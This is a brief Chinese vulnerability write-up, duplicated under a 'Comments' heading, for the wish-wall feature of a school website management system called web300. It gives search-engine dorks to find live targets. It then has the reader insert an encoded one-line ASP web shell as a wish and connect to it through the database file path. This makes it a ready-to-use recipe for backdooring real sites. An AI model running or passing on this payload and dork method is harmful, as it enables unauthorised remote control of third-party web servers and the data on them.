漏洞描述:
web300全能学校网站管理系统对许愿墙的数据库未处理,可插入一句话。
漏洞测试:
Google:inurl:plus_dg.asp 或者 inurl:downdown.asp
跳到/xy/wish.asp页面,点击 我要许愿 在许愿内容处插入一句话 ┼攠數畣整爠煥敵瑳∨≡┩愾,连接数据库 地址:xy/web300%25%23%40.asp。
Comments
漏洞描述:
web300全能学校网站管理系统对许愿墙的数据库未处理,可插入一句话。
漏洞测试:
Google:inurl:plus_dg.asp 或者 inurl:downdown.asp
跳到/xy/wish.asp页面,点击 我要许愿 在许愿内容处插入一句话 ┼攠數畣整爠煥敵瑳∨≡┩愾,连接数据库 地址:xy/web300%25%23%40.asp。